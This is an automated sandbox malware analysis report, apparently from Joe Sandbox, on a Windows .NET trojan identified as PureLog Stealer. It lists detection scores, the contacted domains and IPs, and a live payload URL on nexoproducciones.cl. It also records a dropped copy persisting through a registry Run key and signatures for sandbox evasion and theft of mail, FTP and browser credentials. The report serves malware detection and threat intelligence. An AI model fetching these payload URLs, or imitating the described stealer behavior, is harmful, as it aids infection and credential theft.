                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467001 Sample: 6Ek4nfs2y1.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 32 nexoproducciones.cl 2->32 34 ifconfig.me 2->34 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected PureLog Stealer 2->48 50 7 other signatures 2->50 7 6Ek4nfs2y1.exe 16 5 2->7         started        12 Qulzerug.exe 14 3 2->12         started        14 Qulzerug.exe 2 2->14         started        signatures3 process4 dnsIp5 36 nexoproducciones.cl 104.21.10.178, 443, 49704, 49706 CLOUDFLARENETUS United States 7->36 24 C:\Users\user\AppData\Roaming\Qulzerug.exe, PE32 7->24 dropped 26 C:\Users\...\Qulzerug.exe:Zone.Identifier, ASCII 7->26 dropped 28 C:\Users\user\AppData\...\6Ek4nfs2y1.exe.log, ASCII 7->28 dropped 52 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->52 16 6Ek4nfs2y1.exe 2 7->16         started        54 Multi AV Scanner detection for dropped file 12->54 56 Machine Learning detection for dropped file 12->56 20 Qulzerug.exe 12->20         started        22 Qulzerug.exe 14->22         started        file6 signatures7 process8 dnsIp9 30 ifconfig.me 34.117.118.44, 49705, 49712, 49713 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 16->30 38 Tries to steal Mail credentials (via file / registry access) 22->38 40 Tries to harvest and steal ftp login credentials 22->40 42 Tries to harvest and steal browser information (history, passwords, etc) 22->42 signatures10

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  6Ek4nfs2y1.exe71%ReversingLabsWin32.Trojan.Leonem
                  6Ek4nfs2y1.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\Qulzerug.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\Qulzerug.exe71%ReversingLabsWin32.Trojan.Leonem
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                  https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                  https://github.com/mgravell/protobuf-net0%Avira URL Cloudsafe
                  https://github.com/mgravell/protobuf-netJ0%Avira URL Cloudsafe
                  http://ifconfig.me/ip0%Avira URL Cloudsafe
                  https://github.com/mgravell/protobuf-neti0%Avira URL Cloudsafe
                  https://nexoproducciones.cl/Qlnxkam.datt0%Avira URL Cloudsafe
                  https://nexoproducciones.cl0%Avira URL Cloudsafe
                  https://nexoproducciones.cl/Qlnxkam.dat0%Avira URL Cloudsafe
                  http://ifconfig.me0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  nexoproducciones.cl
                  104.21.10.178
                  truefalse
                    unknown
                    ifconfig.me
                    34.117.118.44
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://ifconfig.me/ipfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://nexoproducciones.cl/Qlnxkam.datfalse
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://github.com/mgravell/protobuf-net6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.com/mgravell/protobuf-neti6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://stackoverflow.com/q/14436606/233546Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.00000000029E6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://github.com/mgravell/protobuf-netJ6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002841000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.000000000341B000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002E0A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://nexoproducciones.cl/Qlnxkam.datt6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://stackoverflow.com/q/11564914/23354;6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://stackoverflow.com/q/2152978/233546Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://nexoproducciones.cl6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002841000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ifconfig.me6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.000000000341B000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002E0A000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002E1B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      34.117.118.44
                      ifconfig.meUnited States
                      139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                      104.21.10.178
                      nexoproducciones.clUnited States
                      13335CLOUDFLARENETUSfalse
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1467001
                      Start date and time:2024-07-03 16:16:07 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 8m 17s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:18
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:6Ek4nfs2y1.exe
                      renamed because original name is a hash value
                      Original Sample Name:c2d87b5b3c906a6725f420ee3e5cb28a81bcc756b1935d6875578bbc73978687.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@9/4@2/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 96%
                      • Number of executed functions: 111
                      • Number of non-executed functions: 2
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: 6Ek4nfs2y1.exe
                      TimeTypeDescription
                      10:16:55API Interceptor29x Sleep call for process: 6Ek4nfs2y1.exe modified
                      10:17:10API Interceptor111x Sleep call for process: Qulzerug.exe modified
                      16:17:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Qulzerug C:\Users\user\AppData\Roaming\Qulzerug.exe
                      16:17:09AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Qulzerug C:\Users\user\AppData\Roaming\Qulzerug.exe
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      34.117.118.44SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exeGet hashmaliciousUnknownBrowse
                      • ifconfig.me/ip
                      SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exeGet hashmaliciousUnknownBrowse
                      • ifconfig.me/ip
                      lQV0SgKoqe.exeGet hashmaliciousUnknownBrowse
                      • www.myexternalip.com/raw
                      lQV0SgKoqe.exeGet hashmaliciousUnknownBrowse
                      • www.myexternalip.com/raw
                      Jv7Z27rOoW.exeGet hashmaliciousUnknownBrowse
                      • /
                      Jv7Z27rOoW.exeGet hashmaliciousUnknownBrowse
                      • /
                      file.exeGet hashmaliciousUnknownBrowse
                      • ifconfig.me//
                      file.exeGet hashmaliciousUnknownBrowse
                      • ifconfig.me//
                      file.exeGet hashmaliciousUnknownBrowse
                      • ifconfig.me//
                      x3oDq746Ub.exeGet hashmaliciousTrickbotBrowse
                      • ipecho.net/plain
                      104.21.10.178Solicitud de presupuesto_____________________________.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • nexoproducciones.cl/Cmtjdjn.wav
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      nexoproducciones.clq86onx3LvU.exeGet hashmaliciousPureLog StealerBrowse
                      • 104.21.10.178
                      filesno5670023475729374.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 104.21.10.178
                      Transferir copia________________pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 104.21.10.178
                      Solicitud de presupuesto_____________________________.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 104.21.10.178
                      Orders34754733________________________pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 172.67.146.41
                      ifconfig.meuJ5c4dQ44E.exeGet hashmaliciousUnknownBrowse
                      • 34.117.118.44
                      uJ5c4dQ44E.exeGet hashmaliciousUnknownBrowse
                      • 34.117.118.44
                      SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exeGet hashmaliciousUnknownBrowse
                      • 34.117.118.44
                      SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exeGet hashmaliciousUnknownBrowse
                      • 34.117.118.44
                      Jv7Z27rOoW.exeGet hashmaliciousUnknownBrowse
                      • 34.117.118.44
                      Jv7Z27rOoW.exeGet hashmaliciousUnknownBrowse
                      • 34.117.118.44
                      file.exeGet hashmaliciousUnknownBrowse
                      • 34.117.118.44
                      file.exeGet hashmaliciousUnknownBrowse
                      • 34.117.118.44
                      file.exeGet hashmaliciousUnknownBrowse
                      • 34.117.118.44
                      mhddos_proxy_win.exeGet hashmaliciousUnknownBrowse
                      • 34.117.118.44
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      GOOGLE-AS-APGoogleAsiaPacificPteLtdSGSafeguard and Grow Your Assets.htmlGet hashmaliciousUnknownBrowse
                      • 34.117.186.192
                      http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwlGet hashmaliciousHTMLPhisherBrowse
                      • 34.117.186.192
                      https://gilbertnow.com/lscache/?initiate=kZwivKCdReGfjYUlVXF2v3UdvZ9rRqUivHGet hashmaliciousUnknownBrowse
                      • 34.117.146.176
                      https://docs.google.com/presentation/d/e/2PACX-1vRs-1lM259_-Jwhsbc-dg0JIYZUboF3mrOYVHYTqbAmT7KWBl_mwNRSNl0N9QrU4kN-s-_PFfno5ZP3/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                      • 34.66.3.160
                      https://t4ha7.shop/Get hashmaliciousUnknownBrowse
                      • 34.117.186.192
                      1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                      • 34.117.186.192
                      16bfcGvz5N.elfGet hashmaliciousUnknownBrowse
                      • 34.118.114.113
                      http://www.escalon.servicesGet hashmaliciousUnknownBrowse
                      • 34.118.20.215
                      https://rlcold.com/projects/Get hashmaliciousUnknownBrowse
                      • 34.66.179.7
                      Cheat.malware_exe.exeGet hashmaliciousUnknownBrowse
                      • 34.117.186.192
                      CLOUDFLARENETUShttps://www.filemail.com/t/RuKZYfeBGet hashmaliciousHTMLPhisherBrowse
                      • 172.64.41.3
                      kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
                      • 172.67.196.55
                      q86onx3LvU.exeGet hashmaliciousPureLog StealerBrowse
                      • 104.21.10.178
                      d8gZVaN0ms.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, VidarBrowse
                      • 188.114.96.3
                      https://m.exactag.com/ai.aspx?tc=d9177038bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Atheannapolis250.org%2Fwinner%2F14136%2F%2FYnJhbndlbGwubW9mZmF0QGtwcy5jb20=Get hashmaliciousHTMLPhisherBrowse
                      • 104.17.2.184
                      https://link.mail.beehiiv.com/ls/click?upn=u001.I67xw9O-2FCIng4d3bGWl4wF1gb7u7ov5hHZyE-2Bbx9UTzw17nXfIKdJcwxuwzDNoy2zqPLSJo-2BNEQCUif7aqDwom-2FNyeTx4oiB0wLXwXnzsK4D0yrlxIKEkPM7Cj-2FHMmK1N5sLNWwmlbyGbHeuv6ehAEECnEs6fFQOqqwD-2FKToPwl8ZCnBHVdQ3QU8RWhloPcfXcxa_hzdxOAnI3B-2BYhj5tgQXSRCdoGEcuM88dXETG-2BahO6Uvd8cr2jZPTzAVk72oAubAHPgVJjhCdU6bjbXnflniNIkDzPhLxyvQL1dSWfR-2BUbH1DS3LUwJipSkZoP8d1ryYR0TIdt5CyNutkaFy6gLHYcR4kl-2Fz1ezOldYW2WX0ghZl4CCdgYPK2Cj3fM7MmBqLOIY-2B5u5WgDkBzfdFRbwHzvpAejc0JJJ7tYmz-2BUzjH-2BoYmk-2F0HGjFVUaYNWyGnhGX4EhZzw6qOcJEaxZhVjnDpWPL3U5gs5ZetaaeYkMX5whQyh7U-2B0b4Qj0LqFla1tJlWVR4EZMTu40FIJ9BSbWnjEcc9JxuCrqAu48-2BpVmjPzA43qg6bd2x0AWoed1RbQeWVzBT648qZJ7L-2FqgKPY6ysg2U7IBuGeVI7oxhhKCbXSZln5jVQGdCxXpADLZSMla5T1Id6eeDoJeYo7zr6VqE6vw-3D-3D#aGFydG11dC5zY2htaWR0QGtwcy1jb25zdWx0aW5nLmNvbQ==Get hashmaliciousUnknownBrowse
                      • 104.17.2.184
                      8bwKawHg0Z.exeGet hashmaliciousFormBookBrowse
                      • 23.227.38.74
                      7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                      • 104.21.84.69
                      ptKNiAaGus.exeGet hashmaliciousUnknownBrowse
                      • 104.16.185.241
                      Quarantined Messages (1).zipGet hashmaliciousHTMLPhisherBrowse
                      • 172.67.148.54
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      3b5074b1b5d032e5620f69f9f700ff0eq86onx3LvU.exeGet hashmaliciousPureLog StealerBrowse
                      • 104.21.10.178
                      tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 104.21.10.178
                      19808bS58f.exeGet hashmaliciousAgentTeslaBrowse
                      • 104.21.10.178
                      SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.6737.3783.exeGet hashmaliciousAgentTeslaBrowse
                      • 104.21.10.178
                      dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbsGet hashmaliciousUnknownBrowse
                      • 104.21.10.178
                      http://beonlineboo.comGet hashmaliciousUnknownBrowse
                      • 104.21.10.178
                      9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 104.21.10.178
                      0VcrCVxnMP.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 104.21.10.178
                      E48ALuMJ3m.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 104.21.10.178
                      MzjwuZnJF0.exeGet hashmaliciousGuLoaderBrowse
                      • 104.21.10.178
                      No context
                      Process:C:\Users\user\Desktop\6Ek4nfs2y1.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1242
                      Entropy (8bit):5.363036002058323
                      Encrypted:false
                      SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeRE4Kx1qE4j:MxHKlYHKh3owH8tHo6hAHKzeRHKx1qHj
                      MD5:F1F711CFAECF73CB41019220224BA3D7
                      SHA1:3FBBB184F8CB609B0854E6966021CF94CD684C8A
                      SHA-256:B8374EA1B272A4A1D9B698BB7E4589191563DE7AEB03AB4B1BD56A09A5F5C5B1
                      SHA-512:CE6358F1D7E440C0873DFD65C9DC14804749CA41DB3582A59314C01FF10CD6A037A720777D6C14EC454EED400B2DB52CFBFC3F1954C16BFF207F76E9A4847ADF
                      Malicious:true
                      Reputation:moderate, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                      Process:C:\Users\user\AppData\Roaming\Qulzerug.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1242
                      Entropy (8bit):5.363036002058323
                      Encrypted:false
                      SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeRE4Kx1qE4j:MxHKlYHKh3owH8tHo6hAHKzeRHKx1qHj
                      MD5:F1F711CFAECF73CB41019220224BA3D7
                      SHA1:3FBBB184F8CB609B0854E6966021CF94CD684C8A
                      SHA-256:B8374EA1B272A4A1D9B698BB7E4589191563DE7AEB03AB4B1BD56A09A5F5C5B1
                      SHA-512:CE6358F1D7E440C0873DFD65C9DC14804749CA41DB3582A59314C01FF10CD6A037A720777D6C14EC454EED400B2DB52CFBFC3F1954C16BFF207F76E9A4847ADF
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                      Process:C:\Users\user\Desktop\6Ek4nfs2y1.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):9728
                      Entropy (8bit):5.073591133484043
                      Encrypted:false
                      SSDEEP:192:7/4Pvs83Kt8WbtgD+RWok9Ztk/PSLJNjj5NBCST5:r2s83Kt86OgWo0bqqLJZjUST
                      MD5:21CCB2CD9A4FBC259AB1110BC687B960
                      SHA1:10D68517383A76DD23E172C1F02A74CADF104B34
                      SHA-256:C2D87B5B3C906A6725F420EE3E5CB28A81BCC756B1935D6875578BBC73978687
                      SHA-512:9954846094F6326E8627D19A11522E745622A4BD1CF52C9D9230D10657252CD65E199075B6CCCA24D082A55BAC7F8850169917ED45DDF127AE854137BC65B0BC
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 71%
                      Reputation:low
